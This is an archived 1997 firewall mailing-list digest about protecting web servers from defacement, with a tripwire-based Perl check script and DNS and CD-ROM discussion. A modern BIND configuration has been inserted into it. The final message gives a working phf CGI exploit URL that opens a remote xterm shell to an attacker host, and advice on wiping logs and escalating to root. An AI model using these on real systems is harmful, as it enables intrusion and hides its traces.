Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA14595 for ; Wed, 1 Jan 1997 14:01:37 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA17276; Wed, 1 Jan 1997 14:00:17 -0800
Received: from nsco.network.com(129.191.1.1) by mycroft via smap (V1.3mjr) id sma017264; Wed Jan 1 13:54:50 1997
Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA14630; Wed, 1 Jan 97 15:59:16 CST
Received: by mnbp.network.com with Microsoft Mail id <32CADC14@mnbp.network.com>; Wed, 01 Jan 97 15:50:12 CST
From: Craig McLellan
To: Dale Drew, Mark Johnson
Cc: Christopher Klaus, firewalls, Michael Idengren
Subject: RE: WWW Gaffiti Immunity (Off Topic)
Date: Wed, 01 Jan 97 15:49:00 CST
Message-Id: <32CADC14@mnbp.network.com>
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Why not just buy a tool such as web stalker from Haystack ???

RGRDS....clm

----------
From: firewalls-owner
To: Mark Johnson; Dale Drew
Cc: Michael Idengren; Christopher Klaus; firewalls
Subject: WWW Gaffiti Immunity (Off Topic)
Date: December 31, 1996 14:57

>> I don't see how CDROM provides significant advantages on a WEB server
>> "graffiti" attack.

In order to avoid graffiti try something like this:

1) Write a program that checks the size/date of the WWW directory.
   If it fails have it Kill the WWW server
   and send email to the admin.
2) Setup a CRON job to run the program every 15 min.

If a hacker is good enough they will find it, but who would be looking for such a random thing?

Just make sure you change the size whenever you make a change to your documents.

As for CD-ROM WWW sites, I believe the term "Link-rot" comes to mind.

Good Luck,
Brad

Providing The Power Of Operable Networks
Brad Daugherty - Associate Network Systems Engineer
PHONE:(630)942-5770  PAGE:(800)467-1467  FAX:(630)545-0068
Lifetime:

From firewalls-owner Wed Jan 1 14:50:43 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA16050 for firewalls-outgoing; Wed, 1 Jan 1997 14:29:53 -0800 (PST)
Received: from ian.south-border.com (ian.mnsinc.com [206.239.152.197]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA16013 for ; Wed, 1 Jan 1997 14:29:33 -0800 (PST)
Received: (qmail 6547 invoked from network); 1 Jan 1997 22:28:56 -0000
Received: from sparc.south-border.com (128.26.242.90) by sunspot-thin.south-border.com with SMTP; 1 Jan 1997 22:28:56 -0000
Received: from sparc.south-border.com (localhost [127.0.0.1]) by sparc.south-border.com (8.8.4/8.8.4) with ESMTP id RAA02629; Wed, 1 Jan 1997 17:28:53 -0500 (EST)
Message-Id: <199701012228.RAA02629@sparc.south-border.com>
To: firewalls@GreatCircle.COM
cc: Brad Daugherty, Mark Johnson, Dale Drew, Michael Idengren, Christopher Klaus
Subject: Re: WWW Gaffiti Immunity (Off Topic)
In-reply-to: Your message of "Wed, 01 Jan 1997 09:35:47 EST." <199701011435.JAA01074@sparc.south-border.com>
Date: Wed, 01 Jan 1997 17:28:52 -0500
From: The Unseen
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Corrected an obvious error... 8-) here's the latest one. please let me know if you find other errors....

Ian

--------------
#!/usr/local/bin/perl
#
# The purpose of this script is to help secure our WWW files
# from grafitti. We are going to use tripwire to help us keep
# track of file signatures and alert us when there are major
# inconsistencies that may result from someone trying to hack
# our site.
#
# Ideal config consists of a WWW server mounting via NFS the
# document tree. This script is intended to be run on the
# NFS server.
#
# Feel free to distribute and/or alter this script as needed.
# But be kind and email me the changes... ian@south-border.com

package WWWcheck;

$Alert=0;
@SendData=();
$DoBoth=0;
$DoNFS=0;
$DoRmHttp=0;

# Specify the email address of the admin you want information
# mailed to.
$AdminUser="securityuser";

# Specify the method of emailing.
$SendmailCMD="/usr/lib/sendmail -t";

# The following variables define where tripwire is. Specify
# the correct database and config files to be given to tripwire
# as options. Tripwire will run in quiet mode to eliminate
# pass babble.
$TripCMD="/place/to/bin/tripwire";
$TripDatabase="/place/to/tripwire/www.database";
$TripConfigFile="/place/to/tripwire/WWW.conf";

# If your WWW server mounts its document tree via NFS from
# a hardened server and this script and tripwire run on the
# NFS server, set DoNFSshare to 1. This will unshare the NFS
# directory after a grace period defined below.
$DoNFSshare=1;
$NFSunsharecmd="/usr/sbin/unshare";
$NFSwwwdir="/place/to/real/NFS/server/WWW";

# Change this to 1 to kill the httpd server remotely based on
# the outcome of tripwire. Be sure to review RemoteHttpKill,
# RemoteHost, and RemoteCMD. I like ssh because of the key
# exchange.
$DoRemoteKill=0;

# These are used when DoRemoteKill is set to 1
$RemoteCMD="/opt/PUBsshd/bin/ssh";
$RemoteHost="WWW";
$RemoteHttpKill="/etc/init.d/httpd stop";

# This defines how long to wait gracefully before proceeding
# with killing the httpd server and NFS server.
$SleepTime="sleep 3600";

#<----you do not need to change anything below here--->

# Issue tripwire command with options. Compile a list of
# changes that have occurred from the last update of the
# tripwire database. Save these modifications to be sent
# as a notification to the admin.
sub BuildTripDatabase {
    open(Tripdata,"$TripCMD -d $TripDatabase -c $TripConfigFile -q|")
        || die "cannot run $TripCMD: $!";
    while(<Tripdata>) {
        chop;
        push(@SendData,$_);
    }
    close(Tripdata);
}

# Mail the tripwire differences to the admin and record which
# defensive actions the options call for.
sub AlertAdmin {
    # Tripwire reported nothing: no mail and no action.
    if(@SendData == 0) { return; }
    open(ALERT,"|$SendmailCMD") || die "cannot run $SendmailCMD: $!";
    print ALERT "To: $AdminUser\n";
    print ALERT "Cc:\n";
    print ALERT "Subject: WWW server Document tree\n";
    print ALERT "\n";        # blank line ends the mail headers (sendmail -t)
    print ALERT "-------\n";
    print ALERT "Has changed since the last tripwire database update. Here\n";
    print ALERT "is a summary of the output from tripwire run at \n\n\n";
    for(@SendData) { print ALERT "$_\n"; }
    print ALERT "\nThe following actions will be taken...\n\n";
    if($DoNFSshare == 1 && $DoRemoteKill == 1) {
        print ALERT "Your WWW server mounts its document tree via NFS from\n";
        print ALERT "this server and you have elected to kill the remote httpd\n";
        print ALERT "daemon running on the WWW server. The following command will be\n";
        print ALERT "issued:\n\n";
        print ALERT "$SleepTime ; $NFSunsharecmd $NFSwwwdir ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'\n\n";
        close(ALERT);
        $DoBoth=1;
        return;
    }
    if($DoNFSshare == 1) {
        print ALERT "Your WWW server is mounting its document tree via an NFS\n";
        print ALERT "server which is this host according to variables set. The\n";
        print ALERT "following command will be issued:\n\n";
        print ALERT "$SleepTime ; $NFSunsharecmd $NFSwwwdir\n\n";
        $DoNFS=1;
    }
    if($DoRemoteKill == 1) {
        print ALERT "According to our options you have elected to disable httpd\n";
        print ALERT "service on the WWW server. The following command will be\n";
        print ALERT "issued:\n\n";
        print ALERT "$RemoteCMD $RemoteHost '($SleepTime ; $RemoteHttpKill)'\n\n";
        $DoRmHttp=1;
    }
    if($DoNFSshare == 0 && $DoRemoteKill == 0) {
        print ALERT "Although we have detected differences that may indicate an\n";
        print ALERT "attack, options set tell us that we are to take no action\n";
        print ALERT "in response. YOU MUST CHECK to see if this is really the\n";
        print ALERT "intended reaction to the tripwire output!\n\n";
    }
    close(ALERT);
}

# Carry out the actions announced by AlertAdmin, after the grace period.
sub PerformKill {
    if($DoBoth) {
        print STDERR `$SleepTime ; $NFSunsharecmd $NFSwwwdir ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'`;
        return;
    }
    if($DoNFS) {
        print STDERR `$SleepTime ; $NFSunsharecmd $NFSwwwdir`;
    }
    if($DoRmHttp) {
        print STDERR `$SleepTime ; $RemoteCMD $RemoteHost '($RemoteHttpKill)'`;
    }
}

sub main {
    &BuildTripDatabase();
    &AlertAdmin();
    &PerformKill();
}

package main;
&WWWcheck::main();

From firewalls-owner Wed Jan 1 16:13:52 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA24273 for firewalls-outgoing; Wed, 1 Jan 1997 16:09:42 -0800 (PST)
Received: from reflections.mindspring.com (reflections.mindspring.com [204.180.142.192]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA24263 for ; Wed, 1 Jan 1997 16:09:35 -0800 (PST)
Received: from localhost (lists@localhost) by reflections.mindspring.com (8.7.1/8.7.1) with SMTP id TAA11101; Wed, 1 Jan 1997 19:06:26 -0500
Date: Wed, 1 Jan 1997 19:06:25 -0500 (EST)
From: Todd Graham Lewis
To: Robert Hanson
cc: Firewall Mailing List
Subject: Re: Christopher Klaus and ISS
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 31 Dec 1996, Robert Hanson wrote:

> no disrespect intended to you Todd, yet....
>
> kill! maim! shoot! my goodness... we are all capitalist pigs... what
> makes anyone better than anyone else standing next to them...
I not only like corporations, I work for one. Believe it or not, I don't even have a problem with vendors discussing their products on the list. Those who offer help to newbies, contribute to technical discussions, etc., are more than entitled to mention once in a while "BTW (disclaimer: I work for 'em), our product X is designed to address this problem", or even to say "In light of the discussion last month, I thought that the list might be interested in our new product, SuperBlammo4000."

What I don't appreciate are bone-headed sales pitches coming from people who never participate in the discussions on the list, and whose sole purpose is to use the list as a free advertising channel. I don't think that this is too far off the mark, and the fact that Klaus is a complete asshole just makes the decision that much easier.

(BTW, I'm sorry I wasn't able to participate in the discussion about Linux firewalls. I was visiting family during the holidays.)

__
Todd Graham Lewis                                      Linux!
Core Engineering                          Mindspring Enterprises
tlewis@mindspring.com                     (800) 719 4664, x2804

From firewalls-owner Wed Jan 1 20:58:57 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA04833 for firewalls-outgoing; Wed, 1 Jan 1997 20:51:23 -0800 (PST)
Received: from kic.or.jp (server.kic.or.jp [202.239.136.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id UAA04798 for ; Wed, 1 Jan 1997 20:51:13 -0800 (PST)
Received: from ppp74.kic.or.jp (ppp74.kic.or.jp [202.239.136.94]) by kic.or.jp with SMTP id NAA06408; Thu, 2 Jan 1997 13:43:00 +0900
Received: by ppp74.kic.or.jp with Microsoft Mail id <01BBF8B3.E469E440@ppp74.kic.or.jp>; Thu, 2 Jan 1997 13:50:19 +0900
Message-ID: <01BBF8B3.E469E440@ppp74.kic.or.jp>
From: "Jason T. Luttgens"
To: "firewalls@greatcircle.com", "'Norm Laudermilch'"
Subject: RE: Air Force Web Site Hacked
Date: Thu, 2 Jan 1997 13:50:18 +0900
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Why not get Practical Unix and Internet Security from O'Reilly and do what it says. I bet if everyone disabled stupid services (on unix hosts), installed TCP wrappers to allow telnets from limited IP addresses, did Cisco's recommendations on preventing IP spoofing, used Linux or another free x86 Unix and ssh to telnet in, and subscribed to security mailing lists to keep up on things, these incidents would slow down a LOT...how many people out there have done this to their unix host?? Get to work you system admins! All this is your fault......

----------
From: Norm Laudermilch[SMTP:norm@UU.NET]
Sent: Wednesday, January 01, 1997 8:57 AM
To: firewalls@greatcircle.com
Subject: Re: Air Force Web Site Hacked

[from Michael Idengren:]
> I don't know about the rest of you but I agree with the idea of putting a
> webserver on a CD-ROM.

[from Thomas Leitner:]
> why not just put it on a separate disk which is mounted
> read-only?

[from Dale Drew:]
> Using a CDROM web-server doesn't provide resistance to an
> attacker who gains access to the system as ROOT...

Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server. In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step.

I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself.
This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though.

Happy new year (2 minutes to go...),
Norm

----------------------------------------------------------------------
Have you cleaned your packet filter lately?  - Josh Osborne
----------------------------------------------------------------------
Norm Laudermilch                      E-mail: norm@uu.net
Manager, Information Security         Phone: 703-206-5952
UUNET Technologies, Inc.
3060 Williams Drive
Fairfax, VA 22031-4648
----------------------------------------------------------------------

From firewalls-owner Thu Jan 2 00:14:13 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA12383 for firewalls-outgoing; Thu, 2 Jan 1997 00:04:46 -0800 (PST)
Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA12376 for ; Thu, 2 Jan 1997 00:04:38 -0800 (PST)
Received: by dtcro002.apogee-com.fr; id JAA03427; Thu, 2 Jan 1997 09:04:50 +0100 (MET)
Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (3.2) id xma003425; Thu, 2 Jan 97 09:04:41 +0100
Received: from ingpc001.apogee-com.fr by (4.1/SMI-4.1) id AA18713; Thu, 2 Jan 97 09:02:03 +0100
Message-Id: <3.0.32.19970102090259.006f63d8@apogee1.apogee-com.fr>
X-Sender: jfzw@apogee1.apogee-com.fr
X-Mailer: Windows Eudora Pro Version 3.0 Demo (32)
Date: Thu, 02 Jan 1997 09:03:03 +0100
To: "R. McMahon", firewalls@GreatCircle.COM
From: Jean-Francois ZWOBADA
Subject: Re: DNS Proxy and Internal Root Name Server
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 16:59 31/12/1996 -0500, R. McMahon wrote:
>Background:
>I am looking at setting up a DNS proxy using "forwarders" and "slave"
>lines in my /etc/named.boot file as described in the "Building
>Firewalls" and "DNS and BIND" books by O'Reilly. However, I want to do
>this where I can maintain an internal Root name server. For resolution
>of domain names outside the internal top-level domains, I would like the
>proxy name server (which will have an "external" domain name) be the
>only name server queried by the internal root name server and having
>this proxy be the only host to query external name servers. (I would
>set up UDP port 53 filtering on the router.)
>
>Problem:
>One problem I thought of concerns the mitigation between the internal
>root name server and the forwarders/slave lines. If a subordinate
>domain name server queries the root name server for an "outside" domain,
>how would it know to forward the query to the proxy (being that it is an
>internal root name server)? I could have my subordinate top-level
>domain name servers query the proxy directly by putting a forwarders line
>in its /etc/named.boot, however, this would bypass the internal root
>structure. It seems to be straightforward w/o an internal root name
>server, however, I need to maintain these root name servers. Can anyone
>help?
>
>Thanks,
>
>rwm
>

The problem with an internal root server is that it won't take any account of your forwarders & slave options because it is said to be a root server.

The only solution I think of is adding the noforward patch in the named daemons of the first level name servers you have under your root server. You just have to specify all the domains known by your internal root nameserver so that your lower level nameserver would query it but would forward to your proxy for everything else.

Hope this helps

Jean-Francois

PS: the noforward patch is available for BIND on ftp.vix.com (but I can't remember the path...)
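The policy Jean-Francois describes (the internal root stays authoritative for the internal namespace, first-level servers query it for those domains and hand everything else to the proxy) can be expressed in stock BIND 9 named.conf without the BIND 4 noforward patch, using a global forward-only to the proxy, a hint zone that points at the internal root, and an empty per-zone forwarders list for each internal domain. This is an added example, not configuration from the thread; the zone corp.example and the addresses 10.0.0.53 (internal root) and 192.0.2.53 (DNS proxy) are made up.

```conf
// named.conf for a FIRST-LEVEL internal name server (added example, not from the thread).
// Assumed: internal root at 10.0.0.53, DNS proxy (the only host the router lets
// speak UDP/53 to the outside) at 192.0.2.53, internal domain corp.example.
options {
    directory "/var/named";
    recursion yes;

    // Default for every name not matched by a zone below: send the query to the
    // proxy and never try outside servers ourselves ("only", not "first").
    forward only;
    forwarders { 192.0.2.53; };
};

// Root hints point at the INTERNAL root, not the Internet root servers.
// internal.root.hints (constructed) holds just:
//   .                       3600000 IN NS root-ns.corp.example.
//   root-ns.corp.example.   3600000 IN A  10.0.0.53
zone "." {
    type hint;
    file "internal.root.hints";
};

// An empty forwarders list for an internal domain cancels the global
// forwarding for that subtree, so these names are resolved by walking
// down from the internal root instead of being sent to the proxy.
zone "corp.example" {
    type forward;
    forwarders { };
};
```

The internal root itself carries no forwarders statement at all, which is the behaviour the reply points out, and the proxy is the one server whose recursion reaches the real Internet root. Checking one internal and one external name against the first-level server with dig, while watching which address the router sees on port 53, confirms the split.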
From firewalls-owner Thu Jan 2 04:59:19 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA22479 for firewalls-outgoing; Thu, 2 Jan 1997 04:49:52 -0800 (PST)
Received: from smtpgw.adtdata.com (smtpgw.adtdata.com [204.183.205.252]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id EAA22465 for ; Thu, 2 Jan 1997 04:49:42 -0800 (PST)
Received: from ADT-Message_Server by smtpgw.adtdata.com with Novell_GroupWise; Thu, 02 Jan 1997 07:50:48 -0500
Message-Id:
X-Mailer: Novell GroupWise 4.1
Date: Wed, 01 Jan 1997 15:10:33 -0500
From: Brian Stone
To: mark@hercules.reno.nv.us, genel@inforamp.net, ddrew@mci.net
Cc: firewalls@GreatCircle.COM, cklaus@iss.net, midengre@stetson.edu
Subject: RE: Air Force Web Site Hacked -Reply
Mime-Version: 1.0
Content-Type: text/plain
Content-Disposition: inline
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Compaq Corp. provides a bootable "Smart Start" OS installation CD with every Proliant 5000 (many people are using these as Netware/IntranetWare or NT file/print/app/web servers). I'm not sure how they do it, I believe it's a function of the BIOS that "knows" about the CD as a bootable media (probably searches A:, C:, D: etc. for boot files); if nothing is in A: and the hard disk isn't partitioned/formatted yet it boots from the CD and steps you through installing the rest of the drivers (hard drive/NIC/etc.) and the OS you purchased! It's cool and I think they've been doing it for a while.

Brian Stone
bstone@KnowledgeSoft.com

>>> Gene Lee 12/31/96 04:00pm >>>
On Tuesday, December 31, 1996 2:41 PM, Mark Johnson[SMTP:mark@hercules.reno.nv.us] wrote:
>I have not set one up yet(Planned for July), but I believe you can have
>a totally CDROM machine, at least using Novell or NT. Bootable CDROMs
>and all data on CDROM so you would not have any writable media.
>
>Can anyone confirm or deny my thoughts?
Slackware Linux has a useable filesystem on CD-ROM, however the boot partition still has to be HD or Floppy. One thing that puzzles me about bootable media is if you have a bootable CD, how does it install the drivers for itself to read from the CD to actually start reading the boot sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me, but I'm no PC guru...

--
Gene Lee
genel@inforamp.net
genelee@vnet.ibm.com

From firewalls-owner Thu Jan 2 05:19:44 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA23064 for firewalls-outgoing; Thu, 2 Jan 1997 05:07:24 -0800 (PST)
Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA23057 for ; Thu, 2 Jan 1997 05:07:09 -0800 (PST)
Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id ha135519 for ; Thu, 2 Jan 1997 14:06:43 +0100
Received: by ppp67.sbbs.se with Microsoft Mail id <01BBF8B5.F541F490@ppp67.sbbs.se>; Thu, 2 Jan 1997 14:05:07 +0100
Message-ID: <01BBF8B5.F541F490@ppp67.sbbs.se>
From: Sebastian Stache
To: "'Firewalls@GreatCircle.COM'"
Subject: Re: Air Force Web Site Hacked
Date: Thu, 2 Jan 1997 14:04:14 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BBF8B5.F54501D0"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

------ =_NextPart_000_01BBF8B5.F54501D0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

I'm getting unnerved by the fact that not only have those sites indeed been hacked, but no one seems to be surprised. What techniques were used? To alter the html files, someone obviously managed to achieve file overwrite rights (at the very least).

If I ran a military/intelligence site for the public, I would think it natural to use a dedicated webserver, with only the servers required to make maintenance feasible running (ie no smtp, telnet etc).
Also, I could think of no reasons to allow anything but html sessions from the outside (since it was dedicated). The level of security problems is often the inverse of the level of flexibility and functionality. In this case it seems to me that the flexibility/functionality can be reduced to a point of mere viewing services, which is why it would be possible to put the files on cdrom (which by the way doesn't help at all if the hacker has gained root access since he can simply point to another location).

So, did the hacked hosts have ftp daemons running, with the firewall allowing outside access? Telnet? Rsh? Or are there html specific inherent weaknesses (even without java etc)?

Regards Sebastian Stache Lund, Sweden

From firewalls-owner Thu Jan 2 06:29:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA27841 for firewalls-outgoing; Thu, 2 Jan 1997 06:23:53 -0800 (PST) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with
ESMTP id GAA27830 for ; Thu, 2 Jan 1997 06:23:46 -0800 (PST) Received: by smartwall.v-one.com; id JAA04533; Thu, 2 Jan 1997 09:20:05 -0500 (EST) Received: from securemail.v-one.com(10.6.0.6) by smartwall.v-one.com via smap (V3.1.1) id xma004524; Thu, 2 Jan 97 09:19:58 -0500 Received: from peg.v-one.com (user@securewall.v-one.com [10.6.0.11]) by securemail.v-one.com (8.7.4/8.7.3) with SMTP id JAA24766; Thu, 2 Jan 1997 09:29:31 -0500 (EST) Message-Id: <2.2.32.19970102141837.0068cea8@localhost> X-Sender: pmcmahan@localhost X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 02 Jan 1997 09:18:37 -0500 To: Sebastian Stache , "'Firewalls@GreatCircle.COM'" From: Peg McMahan Subject: Re: Air Force Web Site Hacked Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>So, did the hacked hosts have ftp daemons
>running, with the firewall allowing outside
>access? Telnet? Rsh? Or are there html
>specific inherent weaknesses (even without
>java etc)?

Yes. It's called cgi-bin. (to mention just one of the many inherent httpd problems.... and cgi is my favourite to pick on)

____________________________________________________________________
Margaret H. McMahan - Systems Engineer pmcmahan@v-one.com "Know your faults, know your friends, Be prepared to take revenge"

From firewalls-owner Thu Jan 2 06:50:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA28080 for firewalls-outgoing; Thu, 2 Jan 1997 06:31:12 -0800 (PST) Received: from uibk.ac.at (ms.uibk.ac.at [138.232.1.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA28072 for ; Thu, 2 Jan 1997 06:31:01 -0800 (PST) Received: from cpq229-rz (cpq229-rz.uibk.ac.at) by uibk.ac.at with SMTP id AA17133 (5.65c/IDA-1.4.4 from matic@bau2.uibk.ac.at for ); Thu, 2 Jan 1997 15:30:10 +0100 Message-Id: <32CBC671.1639@bau2.uibk.ac.at> Date: Thu, 02 Jan 1997 15:30:09 +0100 From: Markus Hübner Organization: NET Design X-Mailer: Mozilla 3.01 (Win16; I) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: Security & Hackerscene site Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

During the last days the site "Security & Hackerscene" has been expanded. New sections specialized on intrusion detection, IP-spoofing, ... will help you to protect your site from break-ins and will give you an insight into the latest methods and tricks used by hackers to break into obviously secure computers. Furthermore many CERT advisories and other security related text files were redesigned and are now available in HTML format. You will also find links to the best information resources (files, e-zines, texts) on the net regarding Internet-Security.
URL of the "Security & Hackerscene" site:
--------------------------------------------------------------
http://www.geocities.com/capecanaveral/3498/security.htm
--------------------------------------------------------------

Some of the items you will find:
+ IP-spoofing demystified
+ Intrusion Detection Checklist
+ CGI Security Holes
+ How hackers cover their tracks
+ Compromise FAQ
+ Protecting Yourself from Password File Attacks
+ The Ultimate Sendmail Hole List
+ An Architectural Overview of UNIX Network Security
+ Essential Security Information
+ UNIX Backdoors
+ UNIX System Security Issues
+ Tips for Improving Your Security
+ as well as files commonly found in the underground scene.

I would be glad to receive your feedback.

Markus Hübner
======================================================================
E-Mail: matic@bau2.uibk.ac.at WWW: http://bau2.uibk.ac.at/matic Working as a freelance WEB-programmer and security-consultant.

From firewalls-owner Thu Jan 2 07:42:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA01690 for firewalls-outgoing; Thu, 2 Jan 1997 07:21:40 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA01672 for ; Thu, 2 Jan 1997 07:21:29 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id KAA29577; Thu, 2 Jan 1997 10:20:44 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id KAA11357; Thu, 2 Jan 1997 10:20:42 -0500 (EST) Date: Thu, 2 Jan 1997 10:20:42 -0500 (EST) Message-Id: <199701021520.KAA11357@SPARKY.CF.CS.YALE.EDU> To: bstone@smtpgw.adtdata.com, ddrew@mci.net, genel@inforamp.net, mark@hercules.reno.nv.us Subject: RE: Air Force Web Site Hacked -Reply Cc: cklaus@iss.net, firewalls@GreatCircle.COM, midengre@stetson.edu Sender:
firewalls-owner@GreatCircle.COM Precedence: bulk

Gene Lee wrote:
>Slackware Linux has a useable filesystem on CD-ROM, however the boot
>partition still has to be HD or Floppy. One thing that puzzles me about
>bootable media is if you have a bootable CD, how does it install the
>drivers for itself to read from the CD to actually start reading the boot
>sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me,
>but
>I'm no PC guru...

RedHat 4.0 has a bootable 'live' Linux filesystem on CDROM. I've booted it on HP PC Vectras -- though the install itself doesn't work well if the CDROM was booted from so I always boot from the floppy to do a RedHat 4.0 install.

Also the NT 4.0 installation CDROMs can be booted on certain supported CDROM drives ("El Cerrito" is one CDROM name I remember from the 4.0 beta).

HP also distributes a CDROM with diagnostic and RAID array tools for its enterprise server PCs ( ie. NetServer LS, etc.) called HP Navigator which is bootable on the NetServer CDROM drive.
- Morrow

From firewalls-owner Thu Jan 2 07:44:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA02482 for firewalls-outgoing; Thu, 2 Jan 1997 07:34:18 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA02462 for ; Thu, 2 Jan 1997 07:34:11 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id KAA00612; Thu, 2 Jan 1997 10:33:42 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id KAA11384; Thu, 2 Jan 1997 10:33:39 -0500 (EST) Date: Thu, 2 Jan 1997 10:33:39 -0500 (EST) Message-Id: <199701021533.KAA11384@SPARKY.CF.CS.YALE.EDU> To: Firewalls@GreatCircle.COM, zeb@sbbs.se Subject: Re: Air Force Web Site Hacked Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Sebastian Stache wrote:
>I'm getting unnerved by the fact that not only
>have those sites indeed been hacked, but no one
>seems to be surprised.
>
>What techniques were used? To alter the html
>files, someone obviously managed to achieve
>file overwrite rights (at the very least).

You'd be surprised at how many NCSA httpd sites are still out there which are vulnerable to the attack:

netscape 'http://www.victim.com/cgi-bin/phf?Qalias=x%0a/usr/bin/X11/xterm%20-display%20mydisplay.attacker.com:0'

Once you have an interactive shell (as an open window on your display) running at the userid the http server (httpd daemon) is running under you can usually then overwrite the httpd logs in the logfile directory to erase any trace of your intrusion. Then you will often find that the htdocs subdirectory is either owned by you or that it has fairly liberal permissions.
And of course, once you are logged in on a machine you can bring over all of the hacker toolkits to automate breaking 'root' -- COPS, crack, "rootkit" (various exploit scripts), etc. Given enough time I'd give most intruders who have managed to login via telnet a pretty good chance ( > 50% ) of breaking maximum security on most Unix systems (ie. gain 'root' privileges).

- Morrow

